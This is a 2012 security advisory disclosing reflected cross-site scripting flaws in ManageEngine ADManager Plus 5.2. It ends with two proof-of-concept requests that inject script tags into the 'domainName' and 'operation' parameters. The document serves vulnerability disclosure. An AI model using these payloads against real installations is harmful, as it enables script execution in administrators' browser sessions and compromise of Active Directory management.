ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities

ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities


Vendor: Zoho Corporation Pvt. Ltd.
Product web page: http://www.manageengine.com
Affected version: 5.2

Summary: ADManager Plus is a simple, easy-to-use Windows
Active Directory Management and Reporting Solution that
helps AD Administrators and Help Desk Technicians with
their day-to-day activities.

Desc: ADManager Plus suffers from multiple XSS vulnerabilities
when parsing user input to the 'domainName' parameter in the
'/jsp/AddDC.jsp' script via GET method and 'operation' parameter
in the '/DomainConfig.do' script via POST method. Attackers can
exploit these weaknesses to execute arbitrary HTML and script
code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5070
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5070.php


06.02.2012

---

#1

 - GET http://localhost:8080/jsp/AddDC.jsp?domainName="><script>alert('zsl')</script> HTTP/1.1


#2

 - POST http://localhost:8080/DomainConfig.do?methodToCall=save HTTP/1.1

   - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert('zsl')</script>&reset=